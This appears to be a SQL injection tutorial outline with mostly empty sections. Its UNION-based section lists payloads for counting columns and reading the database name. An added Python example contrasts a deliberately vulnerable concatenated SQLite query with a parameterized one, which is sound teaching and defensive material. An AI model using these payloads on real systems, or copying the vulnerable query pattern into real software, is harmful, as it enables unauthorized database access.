SQL Injection

Introduction

Basics of SQL Language

What is SQLi

How to detect SQLi

Error Based SQLi

Boolean Based SQLi

UNION Based SQLi

After testing different numbers of columns, we can confirm the number of columns returned by the query behind the search field with this search input:

' UNION SELECT NULL,NULL,NULL,NULL,NULL -- //

We can also see that all of the columns accept string input with this query:

' UNION SELECT 'a','a','a','a','a' -- //

We can see the name of the current database with this query:

' UNION SELECT 'a',database(),'a','a','a' -- //
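
The five-column UNION input shown above, run against a string-concatenated query and against a parameterized one, as an added example that is not part of the original page. It uses Python's sqlite3 with a constructed `products` table; the table, column and function names are assumptions, and because SQLite has no database() function only the column-count and string inputs are exercised.

```python
import sqlite3

def make_db():
    # Constructed sample data: five columns, matching the five-column inputs above.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE products "
               "(id INTEGER, name TEXT, vendor TEXT, category TEXT, price TEXT)")
    db.executemany("INSERT INTO products VALUES (?,?,?,?,?)",
                   [(1, "lamp", "acme", "home", "19.99"),
                    (2, "desk", "acme", "office", "120.00")])
    return db

def search_vulnerable(db, term):
    # Vulnerable: input is concatenated into the SQL text, so a quote in `term`
    # closes the string literal and the remainder is parsed as SQL.
    sql = ("SELECT id, name, vendor, category, price FROM products "
           "WHERE name LIKE '%" + term + "%'")
    return db.execute(sql).fetchall()

def search_safe(db, term):
    # Hardened: the SQL text is fixed; `term` is bound as data and never parsed.
    sql = ("SELECT id, name, vendor, category, price FROM products "
           "WHERE name LIKE ?")
    return db.execute(sql, ("%" + term + "%",)).fetchall()

def compare(term):
    """Return (vulnerable_result, safe_result); a SQL error becomes its message."""
    db = make_db()
    try:
        vulnerable = search_vulnerable(db, term)
    except sqlite3.OperationalError as exc:
        # A column-count mismatch surfaces here; such errors in application
        # logs are a useful detection signal for UNION probing.
        vulnerable = "SQL error: " + str(exc)
    return vulnerable, search_safe(db, term)

if __name__ == "__main__":
    for term in ["lamp",
                 "' UNION SELECT NULL,NULL,NULL,NULL -- //",   # four columns: mismatch
                 "' UNION SELECT 'a','a','a','a','a' -- //"]:  # input from the page
        print(repr(term), "->", compare(term))
```

With the parameterized query the UNION input is only a search string that matches no product name, so it returns no rows and raises no error.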

Automating Exploitation
